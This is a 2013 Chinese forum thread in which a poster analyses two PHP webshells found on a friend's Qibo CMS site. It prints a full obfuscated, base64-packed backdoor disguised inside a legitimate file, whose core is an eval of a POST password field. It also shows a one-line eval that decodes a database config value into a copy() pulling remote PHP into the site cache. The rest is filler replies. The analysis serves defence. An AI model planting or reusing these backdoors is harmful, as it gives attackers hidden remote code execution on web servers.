查看: 2975|回复: 25

查shell想到的新型隐藏木马思路

[复制链接]
发表于 2013-2-10 12:24:33 | 显示全部楼层 |阅读模式

今天有个朋友说他的站有异常,叫我帮看看,齐博的整站。查了下webshell,找到了2条。其中有一条藏得比较奇葩,至少是我没见过的方式,孤陋寡闻吧,可惜用了eval(),高风险关键字啊~

1、混入正常文件中,并把正常文件一起base64掉:


<pre><?php /* Powered by www.qibosoft.com */$lll11l11l11l11l1=__FILE__;eval(base64_decode('JGxsMTFsbGwxMWxsbGwxMWw9Zm9wZW4oJGxsbDExbDExbDExbDExbDEsJ3JiJyk7ZnJlYWQoJGxsMTFsbGwxMWxsbGwxMWwsMjE2MCk7JGxsMWxsbGwxMTExMTExMWw9ZXhwbG9kZSgiXHQiLGJhc2U2NF9kZWNvZGUoZnJlYWQoJGxsMTFsbGwxMWxsbGwxMWwsMjcyKSkpOw=='));$lll111111ll1l1ll=$ll1llll11111111l[0];$l1ll11lllll1ll1l=$lll111111ll1l1ll{2}.$lll111111ll1l1ll{5}.$lll111111ll1l1ll{8}.$lll111111ll1l1ll{11}.$lll111111ll1l1ll{14}.$lll111111ll1l1ll{17}.$lll111111ll1l1ll{20}.$lll111111ll1l1ll{23}.$lll111111ll1l1ll{26}.$lll111111ll1l1ll{29}.$lll111111ll1l1ll{32}.$lll111111ll1l1ll{35}.$lll111111ll1l1ll{38};$l11llll111l1l11l=$l1ll11lllll1ll1l($ll1llll11111111l[1]);$l1l11111ll1l1l1l=$l1ll11lllll1ll1l($l11llll111l1l11l{2}.$l11llll111l1l11l{5}.$l11llll111l1l11l{8}.$l11llll111l1l11l{11}.$l11llll111l1l11l{14}.$l11llll111l1l11l{17}.$l11llll111l1l11l{20}.$l11llll111l1l11l{23});$lll1ll11l11l1ll1=$l1ll11lllll1ll1l($ll1llll11111111l[2]);$l111ll111lll1111=$l1ll11lllll1ll1l($lll1ll11l11l1ll1{2}.$lll1ll11l11l1ll1{5}.$lll1ll11l11l1ll1{8}.$lll1ll11l11l1ll1{11}.$lll1ll11l11l1ll1{14}.$lll1ll11l11l1ll1{17}.$lll1ll11l11l1ll1{20}.$lll1ll11l11l1ll1{23});$ll1lll1lll111111=$l1ll11lllll1ll1l($ll1llll11111111l[3]);$ll11llllll1lllll=$l1ll11lllll1ll1l($ll1lll1lll111111{2}.$ll1lll1lll111111{5}.$ll1lll1lll111111{8}.$ll1lll1lll111111{11}.$ll1lll1lll111111{14}.$ll1lll1lll111111{17}.$ll1lll1lll111111{20}.$ll1lll1lll111111{23});$lll1ll11l1111l11=$l1ll11lllll1ll1l($ll1llll11111111l[4]);$ll1111l11l11llll=$l1ll11lllll1ll1l($lll1ll11l1111l11{2}.$lll1ll11l1111l11{5}.$lll1ll11l1111l11{8}.$lll1ll11l1111l11{11}.$lll1ll11l1111l11{14}.$lll1ll11l1111l11{17}.$lll1ll11l1111l11{20}.$lll1ll11l1111l11{23});$llll11l1ll111l1l=$l1ll11lllll1ll1l($ll1llll11111111l[5]);$llllll1l11llllll=$l1ll11lllll1ll1l($llll11l1ll111l1l{2}.$llll11l1ll111l1l{5}.$llll11l1ll111l1l{8}.$llll11l1ll111l1l{11}.$llll11l1ll111l1l{14}.$llll11l1ll111l1l{17}.$llll11l1ll111l1l{20}.$llll11l1ll111l1l{23});eval($l1ll11lllll1ll1l('JGxsMTFsbGxsbGwxbGxsbGwoJGxsMTFsbGwxMWxsbGwxMWwsMTcpO2V2YWwoJGwxbGwxMWxsbGxsMWxsMWwoJGxsMTFsbGxsbGwxbGxsbGwoJGxsMTFsbGwxMWxsbGwxMWwsMjMyKSkpOw=='));return ;?>dGFiMWVhYjlzY2RlYjg2dG00cXVfZWJkY2ZlanFjMnZvdHBkdndlCU5UWmFjM0p0ZVRnNWJXbDNZV0phYkhsWGNIazBkWE05CWVHNWFPV050WWpGa2NYTnNhbkZrWm1oSVkzaE5jbkU5CWRucGFNVEZ1YW1KS2NIUnNabUpaYm1wWFpIQlJkMjQ5CU9HSmpZV3N6YjJ0U2FXMTVjSE5rYkdWSWMyaEpaSFk5CVoydGFkR0Z0YzNZNVlubDNjbnBhTjNSWGNtczBNbXM54bSULjFL6pblYuIkpO2V2YWwoJGwxbGwxMWxsbGxsMWxsMWwoJ0pHeHNNVEZzYkd4c2JHd3hiR3hzYkd3b0pHeHNNVEZzYkd3eE1XeHNiR3d4TVd3c01qQXBPMlYyWVd3b0pHd3hiR3d4TVd4c2JHeHNNV3hzTVd3b0pHeHNNVEZzYkd4c2JHd3hiR3hzYkd3b0pHeHNNVEZzYkd3eE1XeHNiR3d4TVd3c01qTXlLU2twT3c9PScpKTs=AhDBms0qm82LqpqMrHT1O2V2YWwoJGwxbGwxMWxsbGxsMWxsMWwoJ0pHeHNNVEZzYkd4c2JHd3hiR3hzYkd3b0pHeHNNVEZzYkd3eE1XeHNiR3d4TVd3c01UQXBPMlYyWVd3b0pHd3hiR3d4TVd4c2JHeHNNV3hzTVd3b0pHeHNNVEZzYkd4c2JHd3hiR3hzYkd3b0pHeHNNVEZzYkd3eE1XeHNiR3d4TVd3c01qTXlLU2twT3c9PScpKTs=tGLOYY5fUpO2V2YWwoJGwxbGwxMWxsbGxsMWxsMWwoJ0pHeHNNVEZzYkd4c2JHd3hiR3hzYkd3b0pHeHNNVEZzYkd3eE1XeHNiR3d4TVd3c01UY3BPMlYyWVd3b0pHd3hiR3d4TVd4c2JHeHNNV3hzTVd3b0pHeHNNVEZzYkd4c2JHd3hiR3hzYkd3b0pHeHNNVEZzYkd3eE1XeHNiR3d4TVd3c01qTXlLU2twT3c9PScpKTs=JqjcRhp75i6Lf4MwjO2V2YWwoJGwxbGwxMWxsbGxsMWxsMWwoJ0pHeHNNVEZzYkd4c2JHd3hiR3hzYkd3b0pHeHNNVEZzYkd3eE1XeHNiR3d4TVd3c01qQXBPMlYyWVd3b0pHd3hiR3d4TVd4c2JHeHNNV3hzTVd3b0pHeHNNVEZzYkd4c2JHd3hiR3hzYkd3b0pHeHNNVEZzYkd3eE1XeHNiR3d4TVd3c01qTXlLU2twT3c9PScpKTs=yS0ttoM7R7SDkJpvuNKUO2V2YWwoJGwxbGwxMWxsbGxsMWxsMWwoJ0pHeHNNVEZzYkd4c2JHd3hiR3hzYkd3b0pHeHNNVEZzYkd3eE1XeHNiR3d4TVd3c01USXBPMlYyWVd3b0pHd3hiR3d4TVd4c2JHeHNNV3hzTVd3b0pHeHNNVEZzYkd4c2JHd3hiR3hzYkd3b0pHeHNNVEZzYkd3eE1XeHNiR3d4TVd3c01qTXlLU2twT3c9PScpKTs=vMCvyQqBIgcoO2V2YWwoJGwxbGwxMWxsbGxsMWxsMWwoJ0pHeHNNVEZzYkd4c2JHd3hiR3hzYkd3b0pHeHNNVEZzYkd3eE1XeHNiR3d4TVd3c01UY3BPMlYyWVd3b0pHd3hiR3d4TVd4c2JHeHNNV3hzTVd3b0pHeHNNVEZzYkd4c2JHd3hiR3hzYkd3b0pHeHNNVEZzYkd3eE1XeHNiR3d4TVd3c01qTXlLU2twT3c9PScpKTs=agQLu9pzZf25xZjXjO2V2YWwoJGwxbGwxMWxsbGxsMWxsMWwoJ0pHeHNNVEZzYkd4c2JHd3hiR3hzYkd3b0pHeHNNVEZzYkd3eE1XeHNiR3d4TVd3c01UVXBPMlYyWVd3b0pHd3hiR3d4TVd4c2JHeHNNV3hzTVd3b0pHeHNNVEZzYkd4c2JHd3hiR3hzYkd3b0pHeHNNVEZzYkd3eE1XeHNiR3d4TVd3c01qTXlLU2twT3c9PScpKTs=WOmDsuNvUYJUFK3O2V2YWwoJGwxbGwxMWxsbGxsMWxsMWwoJ0pHeHNNVEZzYkd4c2JHd3hiR3hzYkd3b0pHeHNNVEZzYkd3eE1XeHNiR3d4TVd3c01qQXBPMlYyWVd3b0pHd3hiR3d4TVd4c2JHeHNNV3hzTVd3b0pHeHNNVEZzYkd4c2JHd3hiR3hzYkd3b0pHeHNNVEZzYkd3eE1XeHNiR3d4TVd3c01qTXlLU2twT3c9PScpKTs=hx7OShbiw40pgFI3OeYhO2V2YWwoJGwxbGwxMWxsbGxsMWxsMWwoJ0pHeHNNVEZzYkd4c2JHd3hiR3hzYkd3b0pHeHNNVEZzYkd3eE1XeHNiR3d4TVd3c01UQXBPMlYyWVd3b0pHd3hiR3d4TVd4c2JHeHNNV3hzTVd3b0pHeHNNVEZzYkd4c2JHd3hiR3hzYkd3b0pHeHNNVEZzYkd3eE1XeHNiR3d4TVd3c01qTXlLU2twT3c9PScpKTs=lErzbn3Vk5O2V2YWwoJGwxbGwxMWxsbGxsMWxsMWwoJ0pHeHNNVEZzYkd4c2JHd3hiR3hzYkd3b0pHeHNNVEZzYkd3eE1XeHNiR3d4TVd3c01USXBPMlYyWVd3b0pHd3hiR3d4TVd4c2JHeHNNV3hzTVd3b0pHeHNNVEZzYkd4c2JHd3hiR3hzYkd3b0pHeHNNVEZzYkd3eE1XeHNiR3d4TVd3c01qazJLU2twT3c9PScpKTs=U5zJkvgx0MBjZXZhbCgkbDFsbDExbGxsbGwxbGwxbCgnSkd4c01URnNiR3hzYkd3eGJHeHNiR3dvSkd4c01URnNiR3d4TVd4c2JHd3hNV3dzTVRncE8yVjJZV3dvSkd3eGJHd3hNV3hzYkd4c01XeHNNV3dvSkd4c01URnNiR3hzYkd3eGJHeHNiR3dvSkd4c01URnNiR3d4TVd4c2JHd3hNV3dzTVRNNE9Da3BLVHNrYkd4c2JHeHNNV3d4TVd4c2JHeHNiQ2drYkd3eE1XeHNiREV4Ykd4c2JERXhiQ2s3JykpOw==Orb94oK1BBaoF8cySgaWYoJF9QT1NUWydteXB3ZCddKXsNCglyZXF1aXJlX29uY2UoZGlybmFtZShfX0ZJTEVfXykuIi8uLi8uLi9pbmMvcXEuYXBpLnBocCIpOw0KCUBldmFsKHFxbWQ1KCJVVjlBR3g0ZlhrRVFSQWdlR2tGRkV4aENXVkVMRmdsVlFrd0ZWZ3dkQVZnY1JFZ1dFUlFSVVFzYVFsbEZFUnRmZTU1Yjc0YWU4OSIsJ0RFJywkX1BPU1RbJ215cHdkJ10pKTsNCn0NCg0KaWYoJGpvYj09ImdldCImJiRBcG93ZXJbdXBncmFkZV9vbF0pDQp7DQoNCgloYWNrX2FkbWluX3RwbCgnZ2V0Jyk7DQp9DQplbHNlaWYoJGFjdGlvbj09ImdldCImJiRBcG93ZXJbdXBncmFkZV9vbF0pDQp7DQoJJGZpbGV1cmw9Imh0dHA6Ly9kb3duLnFpYm9zb2Z0LmNvbS91cGdyYWRlLnppcCI7DQoJaWYoJGNvZGU9ZmlsZV9nZXRfY29udGVudHMoJGZpbGV1cmwpKQ0KCXsNCgkJd3JpdGVfZmlsZShST09UX1BBVEguImNhY2hlL3VwZ3JhZGUuemlwIiwkY29kZSk7DQoJfQ0KCWVsc2VpZigkY29kZT1maWxlKCRmaWxldXJsKSkNCgl7DQoJCXdyaXRlX2ZpbGUoUk9PVF9QQVRILiJjYWNoZS91cGdyYWRlLnppcCIsJGNvZGUpOw0KCX0NCgllbHNlaWYoY29weSgkZmlsZXVybCxST09UX1BBVEguImNhY2hlL3VwZ3JhZGUuemlwIikpDQoJew0KCX0NCgllbHNlaWYoJGNvZGU9c29ja09wZW5VcmwoJGZpbGV1cmwpKQ0KCXsNCgkJd3JpdGVfZmlsZShST09UX1BBVEguImNhY2hlL3VwZ3JhZGUuemlwIiwkY29kZSk7DQoJfQ0KDQoJcmVxdWlyZV9vbmNlKFJPT1RfUEFUSC4iaW5jL2NsYXNzLnoucGhwIik7DQoJJHogPSBuZXcgWmlwOw0KCW1ha2VwYXRoKFJPT1RfUEFUSC4iY2FjaGUvdXBncmFkZSIpOw0KCSR6LT5FeHRyYWN0KFJPT1RfUEFUSC4iY2FjaGUvdXBncmFkZS56aXAiLFJPT1RfUEFUSC4iY2FjaGUvdXBncmFkZSIpOw0KCXVubGluayhST09UX1BBVEguImNhY2hlL3VwZ3JhZGUuemlwIik7DQoJZWNobyAiPE1FVEEgSFRUUC1FUVVJVj1SRUZSRVNIIENPTlRFTlQ9JzA7VVJMPSR3ZWJkYlt3d3dfdXJsXS9jYWNoZS91cGdyYWRlL2luZGV4LnBocCc+IjsNCglleGl0Ow0KfQ==Oz1aqN6Bs2Twgiat5H0qQeo5bgm84V1tvONOA</pre>

解出来关键的地方是这样:




&#8203;
@eval(qqmd5("UV9AGx4fXkEQRAgeGkFFExhCWVELFglVQkwFVgwdAVgcREgWERQRUQsaQllFERtfe55b74ae89",'DE',$_POST['mypwd']));
2、一句话。
一全局文件中出现了eval关键字,代码如下:

eval(base64_decode("Y$webdb[_Notice]"));
这段代码还是比较新颖的,$webdb[_Notice] 这个变量,对应的是数据库中config表里key=>value 这样的内容,查了数据库,_Notice的内容为:

29weSgiaHR0cDovL3d3dy5waHAxNjguY29tL05vdGljZS8/dXJsPSR3ZWJkYlt3d3dfdXJsXSIsUEhQMTY4X1BBVEguImNhY2hlL05vdGljZS5waHAiKTs=
那么加上前面有个Y,base64 decode后得到的结果是:

copy("http://www.php168.com/Notice/?url=$webdb[www_url]",PHP168_PATH."cache/Notice.php");
发表于 2013-2-12 07:14:11 | 显示全部楼层
先顶后看  
发表于 2013-2-17 08:25:07 | 显示全部楼层
你喜欢贴子还是发贴子的人  
发表于 2013-2-17 14:02:59 | 显示全部楼层
声明一下:本人看贴和回贴的规则,好贴必看,精华贴必回。  
发表于 2013-2-18 19:05:11 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
发表于 2013-2-19 20:37:34 | 显示全部楼层
长时间没来看了 ~~  
发表于 2013-2-20 00:15:23 | 显示全部楼层
一定要回贴,因为我是文明人哦  
发表于 2013-2-20 06:12:14 | 显示全部楼层
很好!很强大!  
发表于 2013-2-21 17:19:17 | 显示全部楼层
不错不错.,..我喜欢  
发表于 2013-2-22 17:47:06 | 显示全部楼层
你加油吧  
高级模式
B Color Image Link Quote Code Smilies

本版积分规则